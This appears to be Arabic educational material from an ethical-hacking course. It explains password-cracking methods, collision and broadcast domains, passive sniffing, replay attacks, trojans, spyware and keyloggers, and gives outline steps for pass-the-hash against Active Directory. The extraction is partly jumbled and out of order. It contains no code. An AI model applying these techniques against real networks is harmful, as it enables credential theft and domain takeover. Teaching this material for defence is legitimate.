ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﻌﺗﻣد ﻋﻠﻰ ھﺟوم اﻟﻘﺎﻣوس ) .(Dictionary attackھﻧﺎك اﺣﺗﻣﺎﻻت ﺑﺄن اﻟﻧﺎس ﻗد ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم
ﻓﻘط ﻋن طرﯾﻖ إﺿﺎﻓﺔ ﺑﻌض اﻷرﻗﺎم ﻟﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم اﻟﻘدﯾﻣﺔ .ﻓﻲ ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ،ﯾﺿﯾف اﻟﺑرﻧﺎﻣﺞ ﺑﻌض اﻷرﻗﺎم واﻟرﻣوز
إﻟﻰ ﻛﻠﻣﺎت ﻣن Dictionaryوﯾﺣﺎول ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر .ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،إذا ﻛﺎﻧت ﻛﻠﻣﺔ اﻟﻣرور اﻟﻘدﯾﻣﺔ ھﻲ " ،"systemﻓﺎن ھﻧﺎك ﻓرﺻﺔ
أن اﻟﺷﺧص ﯾﻐﯾره إﻟﻰ " "system1أو "."system2
SYLLABLE ATTACK
Syllable attackھو ﻣزﯾﺞ ﻣن ﻛل ﻣن ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ) (brute force attackوھﺟوم اﻟﻘﺎﻣوس). (dictionary attack
ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب ﻋﻧدﻣﺎ ﺗﻛون ﻛﻠﻣﺔ اﻟﻣرور ﻛﻠﻣﮫ ﻟﯾﺳت ﻣوﺟودة .اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا dictionaryوﻏﯾرھﺎ ﻣن اﻟطرق ﻟﻠﻘﺿﺎء ﻋﻠﯾﮫ.
ﯾﺳﺗﺧدم أﯾﺿﺎ ﻓﻲ اﻟﺗرﻛﯾﺑﺎت اﻟﻣﻣﻛﻧﺔ ﻟﻛل اﻟﻛﻠﻣﺎت اﻟﻣوﺟودة ﻓﻲ .dictionary
ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ) (Password Crackingھﻲ واﺣدة ﻣن اﻟﻣراﺣل اﻟﺣﺎﺳﻣﺔ ﻣن ﻗرﺻﻧﺔ اﻟﻧظﺎم .ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﺗﺳﺗﺧدم ﻷﻏراض
ﻗﺎﻧوﻧﯾﺔ ﻓﻲ اﺳﺗرداد ﻛﻠﻣﺔ اﻟﺳر اﻟﻣﻔﻘودة ﻟﻠﻣﺳﺗﺧدم؛ إذا ﺗم اﺳﺗﺧداﻣﮫ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدﻣﯾن ﺑطرﯾﻘﮫ ﻏﯾر ﺷرﻋﯾﺔ ،ﻓﺈﻧﮫ ﯾﻣﻛن أن ﯾﺳﺑب ﻟﮭم
ﻟﻠﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎز ﻏﯾر ﻣﺻرح ﺑﮭﺎ ﻋﻠﻰ اﻟﺷﺑﻛﺔ أو اﻟﻧظﺎم .ﺗﺻﻧف ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﺑﻧﺎء ﻋﻠﻰ إﺟراءات اﻟﻣﮭﺎﺟم ﻓﻲ ﻛﺳر ﻛﻠﻣﺔ
اﻟﻣرور .ﻋﺎدة ﻣﺎ ﺗﻛون ھﻧﺎك أرﺑﻌﺔ أﻧواع وھم:
:Collision domain
ﻧطﺎق اﻟﺗﺻﺎدم ھﻲ اﻟﺗﺻﺎدﻣﺎت اﻟﺗﻲ ﺗﺣدث ﺑﯾن ﺣزم اﻟﺑﯾﺎﻧﺎت ﻓﻲ اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ ﻣن ﻧوع إﯾﺛرﻧت .ﯾﺣدث اﻟﺗﺻﺎدم ﻋﻧد ﻗﯾﺎم أﻛﺛر ﻣن ﺟﮭﺎز
ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ﺑﺈرﺳﺎل ﺣزم ﺑﯾﺎﻧﺎت ﻓﻲ ﻧﻔس اﻟوﻗت ﻣﻣﺎ ﯾﻧﺗﺞ ﻋﻧﮫ ﻓﻘدان ﺗﻠك اﻟﺣزم او ﺣدوث اﺧﺗﻧﺎق ﻓﻲ اﻟﺷﺑﻛﺔ.
ﯾﻧﺗﺞ اﻻﺧﺗﻧﺎق ﺟراء اﺳﺗﺧدام ھﺎب ) (HUBاو اﻟ ُﻣﻛرر ﻓﻲ ﺑﻧﯾﺔ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ .lanوﯾﻣﻛن ﺣل اﻟﻣﺷﻛﻠﺔ ﺑﺎﺳﺗﺧدام اﻟﻣوزع)،(switched
اﻟﺟﺳر) (bridgedواﻟﻣوﺟﮫ )(routerﺣﯾث اﻧﮭﺎ ﺗﻘوم ﺑﺗﻘﺳﯾم ﻣﺟﺎل اﻟﺗﺻﺎدم ﻣﻣﺎ ﯾﻘﻠل ﻣن ﺣدوﺛﮫ ﻣﻊ ﻣﻼﺣظﺔ ان اﻟﻣوﺟﮫ )(routerﯾﻘوم
ﺑﺗﻘﺳﯾم ﻣﺟﺎل اﻟﺑث ) (broadcast domainاﯾﺿﺎ .ﯾﻣﻛن ﺣل ﻣﺷﺎﻛل اﻻﺧﺗﻧﺎق ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺔ ﺗﺣﺳس اﻟﻧﺎﻗل ﻣﺗﻌدد اﻟوﺻول ﻣﻊ
ﺗﺣﺳس اﻟﺗﺻﺎدم(Carrier Sense Multiple Access With Collision detection CSMA/CD).
ﺗﺣﺳس اﻟﻧﺎﻗل ﻣﺗﻌدد اﻟوﺻول ﻣﻊ ﺗﺣﺳس اﻟﺗﺻﺎدم ﻗﺑل ﻗﯾﺎم اي ﺟﮭﺎز ﺑﺎرﺳﺎل اﻟﺑﯾﺎﻧﺎت ،ﯾﺟب ان ﯾﻘوم ﺑﺗﺣﺳس اﻟﻧﺎﻗل واﻟﺗﺄﻛد ﻣن ﻋدم وﺟود
ﺑﯾﺎﻧﺎت ﻋﻠﻰ ذﻟك اﻟﻧﺎﻗل ،ﻋﻧدھﺎ ﯾﻘوم ﺑﺈرﺳﺎل اﻟﺑﯾﺎﻧﺎت اﻟﻰ وﺟﮭﺗﮭﺎ.
:Broadcast domain
ﻣﺟﺎل اﻟﺑث وھﻲ ﻣﺟﻣوﻋﺔ ﻣن اﻻﺟﮭزة اﻟﻣرﺑوطﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ،Lanﺑﺣﯾث ﯾﻣﻛن ﻷي ﻋﻘدة اﻟﺑث ﻟﻠﻣﺟﻣوﻋﺔ ﻋن طرﯾﻖ طﺑﻘﺔ رﺑط
اﻟﺑﯾﺎﻧﺎت ﻣن ﻣرﺟﻊ أو إس آي .ﯾﻣﻛن ﻟﻧظﺎم اﻟﺑث ان ﯾﻛون ﻋﻠﻰ ﻧﻔس ﻣﻘطﻊ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ Lanاو ان ﯾوﺻل ﻟﻣﻘﺎطﻊ اﺧرى ﻣن اﻟﺷﺑﻛﺔ
ﺑﺎﺳﺗﺧدام ادوات رﺑط اﻟﺷﺑﻛﺔ.
ﻣﻌﻠوﻣﺔ ھﺎﻣﺔ ﺟدا ﺟدا ﺟدا
اﻟراوﺗر :ﻛل اﻧﺗر ﻓﯾس ﻣن اﻟراوﺗر ﯾﻌﺗﺑر broadcastوﻓﻲ ﻧﻔس اﻟوﻗت ﻛل اﻧﺗر ﻓﯾس ﯾﻌﺗﺑرCollision domain
اﻟﺳوﯾﺗش :ﻛﻠﮫ ﻋﻠﻰ ﺑﻌﺿﮫ ﯾﻌﺗﺑر broadcastوﻛل اﻧﺗر ﻓﯾس ﯾﻌﺗﺑر. Collision domain
:Hubﻛﻠﮫ ﻋﻠﻰ ﺑﻌﺿﮫ ﯾﻌﺗﺑر .Collision domain
ﻛﻣﺎ ﯾﻘوم packet sniffer toolﺑﺟﻣﻊ اﻟﺣزم ﻓﻲ طﺑﻘﺔ رﺑط اﻟﺑﯾﺎﻧﺎت ، Data Link Layerﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ اﻻﺳﺗﯾﻼء ﻋﻠﻰ ﻛﺎﻓﺔ اﻟﺣزم
ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ) (LANﻣن اﻟﺟﮭﺎز اﻟذي ﯾﻘوم ﺑﺗﺷﻐﯾل ﺑرﻧﺎﻣﺞ .Snifferھذا اﻷﺳﻠوب ﻣن اﻟﺻﻌب ﻧﺳﺑﯾﺎ ﺗﻧﻔﯾذه وﻣﻌﻘد ﺣﺳﺎﺑﯾﺎ .وذﻟك
ﻷن اﻟﺷﺑﻛﺔ ﻣﻊ HUBﺗﻧﻔذ broadcast mediumاﻟﺗﻲ ﯾﺷﺗرك ﻓﯾﮭﺎ ﺟﻣﯾﻊ اﻷﻧظﻣﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ .ﺣﯾث أي ﺑﯾﺎﻧﺎت ﯾﺗم إرﺳﺎﻟﮭﺎ ﻋﺑر
اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ اﻟﻰ ﺟﮭﺎز ﻣﻌﯾن ﻓﮭﯾﺎ ﻓﻲ اﻟواﻗﻊ ﯾﺗم ارﺳﺎﻟﮭﺎ إﻟﻰ ﻛل اﻷﺟﮭزة اﻟﻣﺗﺻﻠﺔ ﺑﺎﻟﺷﺑﻛﺔ اﻟداﺧﻠﯾﺔ .LANﻓﺈذا ﻗﺎم اﻟﻣﮭﺎﺟم ﺑﺗﺷﻐﯾل
Sniffersﻋﻠﻰ أي ﻧظﺎم ﻣوﺟود ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟداﺧﻠﯾﺔ )(LANﻓﺎﻧﮫ ﯾﻣﻛن ﺟﻣﻊ أي ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﻣرﺳﻠﺔ ﻣن وإﻟﻰ أي ﻧظﺎم آﺧر ﻋﻠﻰ اﻟﺷﺑﻛﺔ
اﻟﻣﺣﻠﯾﺔ .ﻏﺎﻟﺑﯾﺔ أدوات اﻟﺗﺟﺳس ) (Sniffersھﻲ ﻣﻧﺎﺳﺑﺔ ﻟﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت ﻓﻲ ﺑﯾﺋﺔ .hubوﺗﺳﻣﻰ ھذه اﻷدوات passive sniffersﻷﻧﮭﺎ
ﺗﻧﺗظر ﺳﻠﺑﯾﺎ )أي ﻻ ﺗﺗﻔﺎﻋل ﻣﻊ أي ﻣن اﻷﺟﮭزة ﻋﻠﻰ اﻟﺷﺑﻛﺔ( اﻟﺑﯾﺎﻧﺎت ﻹرﺳﺎﻟﮭﺎ ،ﻗﺑل اﻟﺗﻘﺎط اﻟﻣﻌﻠوﻣﺎت .ﻓﮭﻲ ﻓﻌﺎﻟﺔ ﻓﻲ ﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت ﺑﺻورة
ﺗدرﯾﺟﯾﺔ ﻣن .LANوﯾﻣﻛن أن ﺗﺷﻣل اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﺗم اﻟﺗﻘﺎطﮭﺎ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣرﺳﻠﺔ إﻟﻰ اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة ﺧﻼل Telnetو ،FTPوﺟﻠﺳﺎت
ﻏﯾر أﻣﻧﮫ ،واﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣرﺳﻠﺔ واﻟﻣﺳﺗﻠﻣﺔ .ﯾﺗم اﺳﺗﺧدام اﻟﺑﯾﺎﻧﺎت ﻟﻠوﺻول ﻏﯾر اﻟﻣﺻرح ﺑﮫ إﻟﻰ اﻟﻧظﺎم اﻟﮭدف .وھﻧﺎك ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ
ﻣن اﻷدوات اﻟﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت ل .passive wire sniffing
ﻓﻲ ھﺟوم اﻹﻋﺎدة ،replay attackﯾﺗم اﻟﺗﻘﺎط اﻟﺣزم ﺑﺎﺳﺗﺧدام ادوات اﻟﺗﻧﺻت ) .(sniffer toolﺑﻌدھﺎ ﯾﺗم اﺳﺗﺧراج اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ
ﻣن اﻟﺣزﻣﮫ ،ﺛم ﯾﺗم وﺿﻊ اﻟﺣزﻣﮫ ﻣرة أﺧرى ﻋﻠﻰ اﻟﺷﺑﻛﺔ .ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﻣﻛن أن ﯾﺳﺗﺧدم ﻹﻋﺎدة اﻟﻣﻌﺎﻣﻼت اﻟﻣﺻرﻓﯾﺔ replay
bank transactionsأو أﻧواع أﺧرى ﻣﻣﺎﺛﻠﺔ ﻣن ﻧﻘل اﻟﺑﯾﺎﻧﺎت أﻣﻼ ﻓﻲ ﺗﻛرار أو ﺗﻐﯾﯾر اﻷﻧﺷطﺔ ،ﻣﺛل اﻟوداﺋﻊ أو اﻟﺗﺣوﯾﻼت.
ﺑﻌض اﻻﻋﺗﺑﺎرات ﻋن اﺳﺗﺧدام ﻋﻣﻠﯾﺔ ﺗﺧﻣﯾن ﻛﻠﻣﺎت اﻟﻣرور وھﻲ ﻛﻣﺎ ﯾﻠﻲ:
-ﯾﺄﺧذ وﻗﺗﺎ طوﯾﻼ ﻟﺗﺧﻣﯾﻧﮭﺎ.
-ﯾﺗطﻠب ﻛﻣﯾﺎت ھﺎﺋﻠﺔ ﻣن اﻟﻧطﺎق اﻟﺗرددي ﻟﻠﺷﺑﻛﺔ.
-ﯾﻣﻛن اﻛﺗﺷﺎﻓﮫ ﺑﺳﮭوﻟﺔ.
Active Online Attack: Trojan/Spyware/Keylogger
ﺣﺻﺎن طروادة Trojanھو ﺷﻔرة ﺻﻐﯾرة ﯾﺗم ﺗﺣﻣﯾﻠﮭﺎ ﻣﻊ ﺑرﻧﺎﻣﺞ رﺋﯾﺳﻲ ﻣن اﻟﺑراﻣﺞ ذات اﻟﺷﻌﺑﯾﺔ اﻟﻌﺎﻟﯾﺔ ،وﯾﻘوم ﺑﺑﻌض اﻟﻣﮭﺎم اﻟﺧﻔﯾﺔ ،ﻏﺎﻟﺑﺎ ً
ﻣﺎ ﺗﺗرﻛز ﻋﻠﻰ إﺿﻌﺎف ﻗوى اﻟدﻓﺎع ﻟدى اﻟﺿﺣﯾﺔ أو اﺧﺗراق ﺟﮭﺎزه وﺳرﻗﺔ ﺑﯾﺎﻧﺎﺗﮫ.
ھو ﻧوع ﻣن اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ/اﻟﻣدﻣرة اﻟﺗﻲ ﻻ ﺗﺗﻧﺎﺳﺦ ﻣن ﺗﻠﻘﺎء ﻧﻔﺳﮭﺎ واﻟذي ﯾظﮭر ﻟﻛﻲ ﯾؤدي وظﯾﻔﺔ ﻣرﻏوب ﻓﯾﮭﺎ وﻟﻛن ﺑدﻻ ﻣن ذﻟك ﯾﻧﺳﺦ
ﺣﻣوﻟﺗﮫ اﻟﺧﺑﯾﺛﺔ .اﻟﺑرﻧﺎﻣﺞ ﯾﺑدو ﻓﻲ اﻟﺑداﯾﺔ ﻷداء وظﯾﻔﺔ ﻣرﻏوب ﻓﯾﮫ ،وﻟﻛن ﻓﻲ واﻗﻊ اﻻﻣر اﻧﮫ ﯾﺳرق اﻟﻣﻌﻠوﻣﺎت أو ﯾﺿر اﻟﻧظﺎم .وﻓﻲ ﻛﺛﯾر ﻣن
اﻷﺣﯾﺎن ﯾﻌﺗﻣد ﻋﻠﻰ اﻷﺑواب اﻟﺧﻠﻔﯾﺔ )(backdoorأو اﻟﺛﻐرات اﻷﻣﻧﯾﺔ اﻟﺗﻲ ﺗﺗﯾﺢ اﻟوﺻول اﻟﻐﯾر اﻟﻣﺻرح ﺑﮫ إﻟﻰ اﻟﻛﻣﺑﯾوﺗر أو اﻟﺟﮭﺎز اﻟﮭدف.
وھذه اﻷﺑواب اﻟﺧﻠﻔﯾﺔ ﺗﻣﯾل إﻟﻰ أن ﺗﻛون ﻏﯾر ﻣرﺋﯾﺔ ﻟﻠﻣﺳﺗﺧدﻣﯾن اﻟﻌﺎدﯾﯾن .أﺣﺻﻧﺔ طروادة ﻻ ﺗﺣﺎول ﺣﻘن ﻧﻔﺳﮭﺎ ﻓﻲ ﻣﻠﻔﺎت أﺧرى ﻣﺛل
ﻓﯾروﺳﺎت اﻟﻛﻣﺑﯾوﺗر .أﺣﺻﻧﺔ طروادة ﻗد ﺗﺳرق اﻟﻣﻌﻠوﻣﺎت ،أو ﺗﺿر ﺑﺄﻧظﻣﺔ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺿﯾف .وﻗد ﺗﺳﺗﺧدم اﻟﺗﻧزﯾﻼت ﺑواﺳطﺔ اﻟﻣﺣرﻛﺎت
أو ﻋن طرﯾﻖ ﺗﺛﺑﯾت اﻷﻟﻌﺎب ﻋﺑر اﻹﻧﺗرﻧت أو اﻟﺗطﺑﯾﻘﺎت اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ اﻹﻧﺗرﻧت ﻣن أﺟل اﻟوﺻول إﻟﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف .واﻟﻣﺻطﻠﺢ
ﻣﺷﺗﻖ ﻣن ﻗﺻﺔ ﺣﺻﺎن طروادة ﻓﻲ اﻷﺳﺎطﯾر اﻟﯾوﻧﺎﻧﯾﺔ ﻷن أﺣﺻﻧﺔ طروادة ﺗﺳﺗﺧدم ﺷﻛﻼ ﻣن أﺷﻛﺎل "اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ" ،وﺗﻘوم ﺑﺗﻘدﯾم
ﻧﻔﺳﮭﺎ ﻋﻠﻰ أﻧﮭﺎ ﻏﯾر ﻣؤذﯾﺔ ،وﻣﻔﯾدة ،ﻣن أﺟل إﻗﻧﺎع اﻟﺿﺣﺎﯾﺎ ﻟﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮭم.
ﺑراﻣﺞ اﻟﺗﺟﺳس ) (spywareھﻲ ﺑراﻣﺞ ﺣﺎﺳوﺑﯾﺔ ﺗﺛﺑت ﺧﻠﺳﺔ ﻋﻠﻰ أﺟﮭزة اﻟﺣﺎﺳوب ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﻟﻣﺳﺗﺧدﻣﯾن أو ﻟﻠﺳﯾطرة ﺟزﺋﯾًﺎ ﻋﻠﻰ
اﻟﺣﺎﺳوب اﻟﺷﺧﺻﻲ ،وھذا ﻣن دون ﻋﻠم اﻟﻣﺳﺗﺧدم .وﻓﻲ ﺣﯾن أن اﻻﺳم )ﺑراﻣﺞ اﻟﺗﺟﺳس( ﯾﺷﯾر إﻟﻰ اﻟﺑراﻣﺞ اﻟﺳرﯾﺔ اﻟﺗﻲ ﺗراﻗب ﺳﻠوك
اﻟﻣﺳﺗﺧدﻣﯾن ،إﻟﻰ أن ﻣﮭﺎﻣﮭﺎ ﺗﺗﺟﺎوز ﺑﻛﺛﯾر ﻣﺟرد اﻟرﺻد .ﺑراﻣﺞ اﻟﺗﺟﺳس ﯾﻣﻛﻧﮭﺎ ﺟﻣﻊ ﻣﺧﺗﻠف اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ ،ﻣﺛل ﺗﺻﻔﺢ اﻹﻧﺗرﻧت،
ورﺻد اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ .وﯾﻣﻛن ﻟﮭذه اﻟﺑراﻣﺞ أﯾﺿﺎ أن ﺗﺳﯾطر ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺻﺎب ﺑﮭﺎ ،وﺗﺗﺣﻛم ﺑﮫ وﺗﻘوم ﺑﻌدة ﻣﮭﺎم ،ﻣﺛل:
ﺗرﻛﯾب ﺑراﻣﺞ إﺿﺎﻓﯾﺔ ،ﺗﺣوﯾل ﻋﺎﺋدات دﻋﺎﺋﯾﺔ ﻟطرف ﺛﺎﻟث ،ﺗﻐﯾﯾر اﻟﺻﻔﺣﺔ اﻟرﺋﯾﺳﯾﺔ ﻟﻣﺳﺗﻌرض اﻟوﯾب ،إﻋﺎدة ﺗوﺟﯾﮫ ﻣﺳﺗﻌرض اﻟوﯾب،
ﺗوﺟﯾﮫ ﻟﻣواﻗﻊ وﯾب ﺿﺎرة وﻣﻔﺧﺧﺔ واﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ ان ﺗﺗﺳﺑب ﻓﻲ اﻟﻣزﯾد ﻣن اﻟﻔﯾروﺳﺎت .ﯾﻣﻛن أﯾﺿﺎ ﻟﺑراﻣﺞ اﻟﺗﺟﺳس أن ﺗﻐﯾر إﻋدادات
اﻟﻛﻣﺑﯾوﺗر ،ﻣﻣﺎ ﻗد ﯾؤدي إﻟﻰ ﺑطﺋﮫ واﻟﺗﺄﺛﯾر ﻋﻠﻰ اﻻﺗﺻﺎل ﺑﺷﺑﻛﺔ اﻻﻧﺗرﻧت .وﻣﻊ ظﮭور ﺑراﻣﺞ اﻟﺗﺟﺳس ظﮭرت ﻣﻌﮭﺎ ﺻﻧﺎﻋﺎت ﺻﻐﯾرة ﺣﺗﻰ
ﻓﻲ اﻟﺗﻌﺎﻣل ﻣﻊ ﻣﻛﺎﻓﺣﺗﮭﺎ ،وﻗد أﺻﺑﺣت ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ﻣن أھم اﻟﺑراﻣﺞ ﻓﻲ ﻣﺟﺎل أﻣن اﻟﻛﻣﺑﯾوﺗر ،وﻗد أﺻدرت ﻋدة ﻗواﻧﯾن ﻓﻲ ﻣﺧﺗﻠف
أﻧﺣﺎء اﻟﻌﺎﻟم ﺗدﯾن اﻟﻣﺗﺳﺑﺑﯾن ﺑﮭذه اﻟﺑراﻣﺞ واﻟﺗﻲ ﺗرﻛب ﺧﻔﯾﺔ ﻓﻲ اﻟﻛﻣﺑﯾوﺗر ﺑﮭدف اﻟﺳﯾطرة ﻋﻠﯾﮫ.
Keyloggerﯾﺳﻣﻰ راﺻد ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ أو أﺣد ﺑراﻣﺞ اﻟﺗﺟﺳس وھو ﺑرﻧﺎﻣﺞ ﻣﺧﻔﻲ ﯾرﺳل ﻋﺑر اﻹﯾﻣﯾل أو اﻧت ﺗﻘوم ﺑﺗﺣﻣﯾﻠﮫ ﻣن أﺣد اﻟﻣواﻗﻊ
ﻏﯾر اﻟﻣوﺛوﻗﺔ أو ﯾﻛون ﺿﻣن اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ واﻧت ﻻ ﺗﻌﻠم ﺑذﻟك .ﺣﯾث ﯾﻘوم ﺑرﻧﺎﻣﺞ اﻟﺗﺟﺳس ﺑﻧﻘل ﻛﺎﻓﺔ ﻣﺎ ﯾﻛﺗب ﺑﻠوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ إﻟﻰ ﺟﮭﺎت
ﺑﻌﯾدة ﻋﺎدة إﻟﻰ ﺻﺎﺣب اﻟﺗﺟﺳس أو ﻣرﺳل اﻟﺑرﻧﺎﻣﺞ ،وھذا ھو أﺧطر ھذه اﻟﻛﺎﺋﻧﺎت واﻟذي ﯾﻌد ﻋﻣﻠﮫ أﺷﺑﮫ ﻣﺎ ﯾﻛون ﺑﻌﻣل ﺣﺻﺎن طروادة أﺣد
أﻧواع ﻓﯾروﺳﺎت اﻟﺗﺟﺳس وﯾﺳﺗﺧدم ﻟﻣراﻗﺑﺔ أﺟﮭزة ﻣﻌﯾﻧﺔ وﻣﻌرﻓﺔ ﻣﺎ ﯾﻛﺗب ﻋﻠﯾﮭﺎ .ﻣﺛل ارﻗﺎم اﻟﺳر وﻛﻠﻣﺎت اﻟدﺧول ارﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن .ﻓﻲ
ﻣﻧﺗﺻف ﺷﮭر ﻓﺑراﯾر ﺳﻧﺔ ،2009ھﺎﺟﻣت اﻟﺷرطﺔ اﻟﻔﯾدراﻟﯾﺔ اﻟﺑرازﯾﻠﯾﺔ ﻣواﻗﻊ ﻓﻲ اﻟﻣدﯾﻧﺔ اﻟﺟﻧوﺑﯾﺔ وﻣﻧﺎطﻖ أﺧرى وأﻟﻘوا اﻟﻘﺑض ﻋﻠﻰ 55
ﺷﺧﺻﺎ ً – ﺗﺳﻌﺔ Keyloggingﻣﻧﮭم ﺗﺣت اﻟﺳن اﻟﻘﺎﻧوﻧﻲ – ﺑﺗﮭﻣﺔ ﻧﺷر ﺑراﻣﺞ ﻣﺧﺗﻠﻔﺔ ﻓﻲ أﺟﮭزة أﻋداد ﻛﺑﯾره ﻣن اﻟﻣواطﻧﯾن اﻟﺑرازﯾﻠﯾﯾن
وﺳﺟﻠت ﻣﺎ ﻛﺗﺑوه ﺧﻼل اﺳﺗﺧداﻣﮭم ﻟﻠﻛﻣﺑﯾوﺗر ﻟﻠوﺻول إﻟﻰ ﺣﺳﺎﺑﺎﺗﮭم اﻟﺑﻧﻛﯾﺔ ﻋﻠﻰ اﻹﻧﺗرﻧت ...اﻟﺑراﻣﺞ اﻟﺻﻐﯾرة ﺟدا ً ﻗﺎﻣت ﺑﺗﺳﺟﯾل أﺳﻣﺎء
اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت ﻣرورھم وأرﺳﻠﺗﮭﺎ إﻟﻰ أﻓراد اﻟﻌﺻﺎﺑﺔ ...اﻟﻣﺑﺎﻟﻎ اﻟﺗﻲ ﺗﻣت ﺳرﻗﺗﮭﺎ ﺑﮭذه اﻟطرﯾﻘﺔ؟ ﻣﻧذ ﺑداﯾﺗﮭم اﻟﻌﻣل ﺑﮭذا اﻷﺳﻠوب ﻓﻲ
ﺷﮭر ﻣﺎﯾو ﻣن اﻟﻌﺎم اﻟﻣﻧﺻرم 4.7 :ﻣﻠﯾون دوﻻر ﻣن ﻣﺋﺗﻲ ﺣﺳﺎب ﺑﻧﻛﻲ ﻣﺧﺗﻠف ﻓﻲ ﺳﺗﺔ ﺑﻧوك.
ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل Keylogger ،ﻗﺎدر ﻋﻠﻰ اﻟﻛﺷف ﻋن ﻣﺣﺗوﯾﺎت ﺟﻣﯾﻊ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺗﻲ ﺗﺗﺄﻟف ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻣن ﻧظﺎم
اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗم ﺗﺛﺑﯾت Keyloggerﻋﻠﯾﮫ.
2- The hacker extracts logged-on hashes and finds a logged-on domain admin account hash
اﻟﻘراﺻﻧﺔ ﯾﻘوﻣون ﺑﺎﺳﺗﺧراج اﻟﮭﺎش اﻟﺧﺎص ﺑﻌﻣﻠﯾﺎت اﻟﺗﺳﺟﯾل ﺛم ﯾﺟد اﻟﮭﺎش اﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺳﺟﯾل ﻣن ﻗﺑل ﻣﺳﺋول اﻟدوﻣﯾن.
3- The hackers use the hash to log on the domain controller
اﻟﻘراﺻﻧﺔ ﯾﻘوﻣون ﺑﺎﺳﺗﺧدام ھذا اﻟﮭﺎش ﻟﺗﺳﺟﯾل اﻟدﺧول اﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن.
4- The hacker extracts all the hashes in the Active Directory database and can now satirize any account
in the domain.
اﻟﻘراﺻﻧﺔ ﯾﻘوﻣون ﺑﺎﺳﺗﺧراج ﻛﺎﻓﺔ اﻟﮭﺎش اﻟﻣوﺟودة ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت Active Directoryوﯾﻣﻛﻧﮫ اﻵن ﯾﺳﺧر أي ﺣﺳﺎب ﻓﻲ اﻟدوﻣﯾن.
Offline Attackﺗﺣدث ﻋﻧد ﯾﻘوم اﻟدﺧﯾل ﺑﺎﻟﺗﺣﻘﻖ ﻣن ﺻﺣﺔ ﻛﻠﻣﺎت اﻟﺳر .ﺣﯾث ﯾﻼﺣظ ﻛﯾف ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺔ اﻟﻣرور .إذا ﺗم ﺗﺧزﯾن أﺳﻣﺎء
